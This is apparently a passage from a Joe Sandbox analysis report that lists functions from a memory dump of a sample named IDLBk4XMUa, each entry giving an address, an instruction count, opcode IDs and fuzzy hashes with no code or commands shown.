                                              Function 00007FFAACCE73A0 Relevance: .1, Instructions: 134COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36c0fdbb6c0dbcdb2ee9ac48644d1eb2f7260ce7684fc72835fa909e8b285d85
                                              • Instruction ID: 49193230c1a370900a05ace5e0d09cfe8494d103d264f90e09e5e7563adc650e
                                              • Opcode Fuzzy Hash: 36c0fdbb6c0dbcdb2ee9ac48644d1eb2f7260ce7684fc72835fa909e8b285d85
                                              • Instruction Fuzzy Hash: C1312672A1EB5A8FF7496B28A8160753BD1EF47714B4401BEE08EC35D3EE18E80647D6
                                              Function 00007FFAACCF164D Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1cfd052757e9374af76678f1c62486a6139def5c13ab5d41dbcea7324c07d1d
                                              • Instruction ID: df079263fe490753732f4fb465564ecb7e1ec775e2a8090461d5e83f9ced698f
                                              • Opcode Fuzzy Hash: f1cfd052757e9374af76678f1c62486a6139def5c13ab5d41dbcea7324c07d1d
                                              • Instruction Fuzzy Hash: EC316862B1DB464FF315A77C90A95F6BBD0EF95221B0442B7C06DC3583DC28E44A8391
                                              Function 00007FFAACD09BA0 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83c80ff056b67a518a13b2affd8fb10782cefdb1903f17c4519299dec6518b5a
                                              • Instruction ID: a6d24f21f8721cfea832956ac97d2f87da4442eb79126493c689ee9702eacf8e
                                              • Opcode Fuzzy Hash: 83c80ff056b67a518a13b2affd8fb10782cefdb1903f17c4519299dec6518b5a
                                              • Instruction Fuzzy Hash: 99311131E1AE4A8FE7A6D72C905467577D1EF96200B0484BAC01EC328ACD29EC4A83C0
                                              Function 00007FFAACCF7628 Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1368655c50420fa3cf74d272c774ca9524c557296b91bf8dc24f1d48669ca34
                                              • Instruction ID: e4c6bef85bfa4b96273b4e0fac82f2c1deb114b36c25a7a06a80bf90af9371a7
                                              • Opcode Fuzzy Hash: b1368655c50420fa3cf74d272c774ca9524c557296b91bf8dc24f1d48669ca34
                                              • Instruction Fuzzy Hash: 35412B30709A088FE6A8EB2CD499B6537E1EF5A714F1580BAE48DC7266DE24EC45C780
                                              Function 00007FFAACCF8F20 Relevance: .1, Instructions: 128COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5360742c8a238f3b8b7cd7be1a43b54c5f4df26a84193c94eddd36465f2b6c4
                                              • Instruction ID: e299686fd92bb4e7800b02e29f762f2b62ca7d19f49107ead531a0c2d3399cd9
                                              • Opcode Fuzzy Hash: b5360742c8a238f3b8b7cd7be1a43b54c5f4df26a84193c94eddd36465f2b6c4
                                              • Instruction Fuzzy Hash: E731493091DB454FE319AB3898058B6BBF0EF56314B1405EFD0AEC3593EA24E946C7D2
                                              Function 00007FFAACCE803D Relevance: .1, Instructions: 127COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d19eff6af72f57cc57345f242e7c3efb353dd7ec738189e8b8b7fb315ae3f68f
                                              • Instruction ID: 30bb24f6e160f78b8267732762da09114039b5eb4f3940f6f12ddd90da927c84
                                              • Opcode Fuzzy Hash: d19eff6af72f57cc57345f242e7c3efb353dd7ec738189e8b8b7fb315ae3f68f
                                              • Instruction Fuzzy Hash: 1841A272E199898FEB45EB68C865AF9B7F1FF4A300B4440F6E40DD71A3CE2899058791
                                              Function 00007FFAACCFAFAC Relevance: .1, Instructions: 125COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1b80b07f900f73a8ee3d9e702a5c6da0cd55c1a578612455a7d3917b7dbe1d0
                                              • Instruction ID: 2f16a8906c136b2be56e1bdd37a4e4be35bee7679fca19bf5e857cb88d9083b4
                                              • Opcode Fuzzy Hash: e1b80b07f900f73a8ee3d9e702a5c6da0cd55c1a578612455a7d3917b7dbe1d0
                                              • Instruction Fuzzy Hash: 19310B6161EB8E4FF3526B3888206747BA1EF47318F5941FBC01DC71D3DA19A94A83D2
                                              Function 00007FFAACCEDE98 Relevance: .1, Instructions: 123COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4480f927d6f6a0b424d117098977c96b6ad226086ac118f6d3ed948843e11d66
                                              • Instruction ID: e684ee220bafafbd0b483ef988d01750fd08822f1468375a0992fb278fa2a4d2
                                              • Opcode Fuzzy Hash: 4480f927d6f6a0b424d117098977c96b6ad226086ac118f6d3ed948843e11d66
                                              • Instruction Fuzzy Hash: AB41FC6248E7C24FD753877098355927FB1AE97224B0A46EFD4C1CF4A3E2594A4AC363
                                              Function 00007FFAACCFAFD9 Relevance: .1, Instructions: 123COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7df3f1e06f30fffd207c6c6e0fd68d58f965cd887d3fe4bc5599fe0f4558f6a0
                                              • Instruction ID: fdb5a9d82f15fc6c54e95593e1bdf22ce7f2ae24572c60e82737a1d2a27fb4ac
                                              • Opcode Fuzzy Hash: 7df3f1e06f30fffd207c6c6e0fd68d58f965cd887d3fe4bc5599fe0f4558f6a0
                                              • Instruction Fuzzy Hash: 39314BA165EB8A4FF3465B3848706707FA1EF47318B1941FBC05DC75C3C918A88A83E2
                                              Function 00007FFAACCF614D Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40dfc0cbc92372565380f30cb265d565479f2e3e82afa0481e7dcc71e42ccc02
                                              • Instruction ID: 6972e3a9cb6ebdb744ce0b626891dbc86f3f71f1d69c6ffa91602fe04ec96160
                                              • Opcode Fuzzy Hash: 40dfc0cbc92372565380f30cb265d565479f2e3e82afa0481e7dcc71e42ccc02
                                              • Instruction Fuzzy Hash: 8E314824A1D7469FF3699F2480544797AE2EFD6705B10C5BED4CFC3586DE38A84583C0
                                              Function 00007FFAACCEE853 Relevance: .1, Instructions: 118COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6260956adbb29c20997122330fa2b2d40887d051e2e21e70d7ad1e6e863973d4
                                              • Instruction ID: 339ece1131892b61fa0f9795344e8cdbd8b03317bfff47f6cb3eafca1b432f1a
                                              • Opcode Fuzzy Hash: 6260956adbb29c20997122330fa2b2d40887d051e2e21e70d7ad1e6e863973d4
                                              • Instruction Fuzzy Hash: 55313F30A1990A8FEB98EF18D491BEA73E1FF9A310F505169E41DC3295CB34E856C7C1
                                              Function 00007FFAACD0B03C Relevance: .1, Instructions: 116COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f8bb063e5beface25d493ae0f87d6bd8aea8fea86d7c960808b384b6dcb2573
                                              • Instruction ID: 9a5205ad364a1a33e8f6cdaaeaac8358e77447add4c1aa58322c430b731ffe28
                                              • Opcode Fuzzy Hash: 9f8bb063e5beface25d493ae0f87d6bd8aea8fea86d7c960808b384b6dcb2573
                                              • Instruction Fuzzy Hash: 4E312862B1EB49AFF7989B2C58552747BD2EB86210F04817BD01EC72D7DD29AC4A43C2
                                              Function 00007FFAACCF8A18 Relevance: .1, Instructions: 110COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 053104b1c099cb3b5270712940484a203d5b9007ca8f2e0f63af7d8b8a63e303
                                              • Instruction ID: 69039f03e1a2c4dacc0fa4a388892717956f6a0dbafd7fca0e59a70385561556
                                              • Opcode Fuzzy Hash: 053104b1c099cb3b5270712940484a203d5b9007ca8f2e0f63af7d8b8a63e303
                                              • Instruction Fuzzy Hash: 0521EBB162C9495FEB4CAA28D846AF977D0EF59310F40407EF46F83697DE25F8464382
                                              Function 00007FFAACD1AAC0 Relevance: .1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1e8f52a1ca8c3765d8438ba9daab51994ac0fa98176480d280b2e3ece88e2e9
                                              • Instruction ID: cded679e11901a46671db1edc62da4fababce1be57bd10d1721ec91346a3dfae
                                              • Opcode Fuzzy Hash: e1e8f52a1ca8c3765d8438ba9daab51994ac0fa98176480d280b2e3ece88e2e9
                                              • Instruction Fuzzy Hash: 14314D3060AA895FF7A89B28C859A7237E1EF96311F04417FE45DD7196DD18EC49C3C0
                                              Function 00007FFAACCF75B8 Relevance: .1, Instructions: 108COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa3d68fc315e57bda9240da7931d7df27549f7bb0abb15e378954dd4c6f969ea
                                              • Instruction ID: 8253451b879fa55145d65651ef37d4c178bb6fd64889df4acbba0d26e4999ca6
                                              • Opcode Fuzzy Hash: aa3d68fc315e57bda9240da7931d7df27549f7bb0abb15e378954dd4c6f969ea
                                              • Instruction Fuzzy Hash: 5631E271B18A498FEFD5DB288854FB577E1FF9A310B1440B6D42EC7296EA24E80987C1
                                              Function 00007FFAACD3CB58 Relevance: .1, Instructions: 108COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 677d10f7918f5563c62dba16e86e7d508b6fcc5ac8e0b48872f9808141c4e0bc
                                              • Instruction ID: 7f683a0ea9405790137093993e8c3d9d9ecc19afd8edc6ec3a30e298c979a2c8
                                              • Opcode Fuzzy Hash: 677d10f7918f5563c62dba16e86e7d508b6fcc5ac8e0b48872f9808141c4e0bc
                                              • Instruction Fuzzy Hash: B731C070719E5A8FEBA4EB1DC088A62B3D1FF6A314B4441B9E15EC3691DE24FC4687C0
                                              Function 00007FFAACD1A2F0 Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2680210f1d9f936c2151370696cdc6076d36d0211093481165a28354e81fb775
                                              • Instruction ID: be929ec27f45e2307852ffc82251ddfb48c7202b160e375e60f0ba8a44f57d11
                                              • Opcode Fuzzy Hash: 2680210f1d9f936c2151370696cdc6076d36d0211093481165a28354e81fb775
                                              • Instruction Fuzzy Hash: 4E31D63161DB489FEB84EB1CD480A66B7E1EB9A314F04467AE44DD7261CE20E98587C2
                                              Function 00007FFAACCE7AE0 Relevance: .1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c1d66a450291bfe3da1fa9283d3a87a0c1b9d79db2ba8d23034328c7f77eab6
                                              • Instruction ID: de316d2d19cc21d29ca0d13e169f40e1beb78205968ec6efe7eaaa44f6ba0411
                                              • Opcode Fuzzy Hash: 6c1d66a450291bfe3da1fa9283d3a87a0c1b9d79db2ba8d23034328c7f77eab6
                                              • Instruction Fuzzy Hash: 9031B261D1DA9ACFEB55EB6888165B9BBA1FF47200B4440F6D05DC71D3DF18A90883D1
                                              Function 00007FFAACCF06AA Relevance: .1, Instructions: 100COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ba6abc797564510726f81059ddece339c76448b2bf410696dfc0dd1a7408ec4
                                              • Instruction ID: 3391a8cd662509c892e138e34194d37f6ecfe4f480a014ef17d8e665791d5c88
                                              • Opcode Fuzzy Hash: 9ba6abc797564510726f81059ddece339c76448b2bf410696dfc0dd1a7408ec4
                                              • Instruction Fuzzy Hash: 5521F736D0AB5E9AF7646B3488016FA7BD0EF86719F4041B7D41CC3082DE28AD1E4AC1
                                              Function 00007FFAACCF6BB2 Relevance: .1, Instructions: 100COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 286c150e8b0a7f4f6e89b5d813bc9d60edb72313c88b0b845d09ac0e02463c0e
                                              • Instruction ID: 0965567c27a670440a8abf86deda75ec33060d5a470ca0db049715e13f92bb7d
                                              • Opcode Fuzzy Hash: 286c150e8b0a7f4f6e89b5d813bc9d60edb72313c88b0b845d09ac0e02463c0e
                                              • Instruction Fuzzy Hash: 0B210E3AD0975D8AF770AB3498215F977E0EF46358F0441BED49DC7082DE29A91D46C1
                                              Function 00007FFAACCF5D1F Relevance: .1, Instructions: 99COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2acff68eeea14d22926ef2eb08c477c4376245f656cb9618bf29c451131ec68a
                                              • Instruction ID: eef847e63923ac59300c62454d643d2f6d3ce1e338dbcdaebcdd5bb8f6f07ffe
                                              • Opcode Fuzzy Hash: 2acff68eeea14d22926ef2eb08c477c4376245f656cb9618bf29c451131ec68a
                                              • Instruction Fuzzy Hash: 62219230718D098FEA98EB2CD449A7177E1EFA9310B1001BAE05EC36A6DE25FC468781
                                              Function 00007FFAACCF1680 Relevance: .1, Instructions: 98COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 785d60fa687563e994839668c2d3fd9718695b353cb77ddd901a2510354569d2
                                              • Instruction ID: 2a6ff4d5b51b8f08d03bf97df3ec7947afe0dfd6ad653157c2471671f6705320
                                              • Opcode Fuzzy Hash: 785d60fa687563e994839668c2d3fd9718695b353cb77ddd901a2510354569d2
                                              • Instruction Fuzzy Hash: 08213A52A2DB864EF215B77C50696F6BBE0DF55310B0442F7D06EC35D3DD18E84A4392
                                              Function 00007FFAACCF6D51 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1eb542baaa486293aad627ebd74ab3c381607833caaebcec429a284088d798dd
                                              • Instruction ID: 74eb1d85c4103e10a12212809d2ec04455ca905be442a4c31b48c72e370414dc
                                              • Opcode Fuzzy Hash: 1eb542baaa486293aad627ebd74ab3c381607833caaebcec429a284088d798dd
                                              • Instruction Fuzzy Hash: BA31879191E7CA9FE757AB7448216A4BFB0AF17304F4904FBD04DC71D3DA285948C7A2
                                              Function 00007FFAACCE164A Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b016f296251359b84144ed3b6f713ddcfa46e73ac2a356659f6bed596217c60b
                                              • Instruction ID: 44db67d543d81f8394f7e00ac6e230a6bc3b12a421b6a31b773e541748b13e29
                                              • Opcode Fuzzy Hash: b016f296251359b84144ed3b6f713ddcfa46e73ac2a356659f6bed596217c60b
                                              • Instruction Fuzzy Hash: F6213762B2CA4E8FE654AB7C541A67577C2EF4A210B0445FAE44DC3293DE18DC0643C1
                                              Function 00007FFAACCF6C89 Relevance: .1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52f211db65c5f79ad805c6f081612d098cb7fd4403978b59ae857905b2fe854c
                                              • Instruction ID: f56b50a64190d56f3de877b1cc286cf22d550fe34ebb82fc7cbadc7ac6ca11d5
                                              • Opcode Fuzzy Hash: 52f211db65c5f79ad805c6f081612d098cb7fd4403978b59ae857905b2fe854c
                                              • Instruction Fuzzy Hash: EF213151D1EB960FE329477858256F53BD0EF5A324B1441BFE4DEC24C3CC0CA80A42A1
                                              Function 00007FFAACCE8191 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 065ecca93569585073f76b11fbc248e7c93959ef4a3044c727ffc027f684236a
                                              • Instruction ID: c3f87e596e3b60bdbd8aee3986d95ac42fee368d1f90e05975dc0a81ecbf4d73
                                              • Opcode Fuzzy Hash: 065ecca93569585073f76b11fbc248e7c93959ef4a3044c727ffc027f684236a
                                              • Instruction Fuzzy Hash: 13210431A4D5894FF785AB3898156F57BE5EF87310F0941F6E04CC71A3CE1C990A4391
                                              Function 00007FFAACCE2A7A Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcfebc69d953cc503af004b58f3dea65e8f93bda7e45c3831cbeb8efac636b19
                                              • Instruction ID: aa00c16a8f2db79617b30630b1c79b0de7d0ec33d0c1714cc84d3d743d3f4a53
                                              • Opcode Fuzzy Hash: fcfebc69d953cc503af004b58f3dea65e8f93bda7e45c3831cbeb8efac636b19
                                              • Instruction Fuzzy Hash: DE21F63191E7C68FE75A9B3898145657BE0EF5322170A81FBD44DC71A3EF18D846C782
                                              Function 00007FFAACCE1E60 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c6c5702b5eedcedaeebe44f8d9790ea85074479295d3ab9e2b8a3eb12ccc6e8
                                              • Instruction ID: 880ff17299bdfcc34a6672b5842f2dc497c4e3ef9cbafa2df50eefcd9f956d44
                                              • Opcode Fuzzy Hash: 8c6c5702b5eedcedaeebe44f8d9790ea85074479295d3ab9e2b8a3eb12ccc6e8
                                              • Instruction Fuzzy Hash: 66212692A0EA8A4FF3A59B6C58592B53BD1EF8B25171442F7E40DC71D7DE18C81E43C1
                                              Function 00007FFAACCF5CE0 Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd6cc51e0b8dec15e6bbc380a0aef0c9ddaaf3333c0fb0ee3f320bea9571cfd9
                                              • Instruction ID: 386940842e49c360b05e9c7f3312b685d9623fb998d7049923dd1901a923fabe
                                              • Opcode Fuzzy Hash: fd6cc51e0b8dec15e6bbc380a0aef0c9ddaaf3333c0fb0ee3f320bea9571cfd9
                                              • Instruction Fuzzy Hash: A42187E1D1DB899FE796AB7488156B8BFB0EF06304F4904FAD04DC71D3DA24594887A2
                                              Function 00007FFAACCE6E6D Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c250df7384b24dbb9b33ca7cff4ab8969f4c83fbdcdd8accafafbd6ede696b00
                                              • Instruction ID: 2b64269f43b914de83d046a458bfe8c990b294b524701554bfa390cbcc10d34e
                                              • Opcode Fuzzy Hash: c250df7384b24dbb9b33ca7cff4ab8969f4c83fbdcdd8accafafbd6ede696b00
                                              • Instruction Fuzzy Hash: 8721C67190D68D4FD741DFB8C8556E9BBF1EF4B210B0482EBD04CCB593DA2899468B91
                                              Function 00007FFAACCE07B8 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b055de8e2803cda30f7d28f995f6960d16f6e6362ad64a2d7b8a57178e6bb3f1
                                              • Instruction ID: 80c19a8f505f1466f9c690c6be590deb1df27f62b4c5d3bab335589a73c95983
                                              • Opcode Fuzzy Hash: b055de8e2803cda30f7d28f995f6960d16f6e6362ad64a2d7b8a57178e6bb3f1
                                              • Instruction Fuzzy Hash: BA11E662B18E1E9FF654EB6C544A67977C2EF8A350F0445BAE04DC3293DE28EC4543C1
                                              Function 00007FFAACCE1E49 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
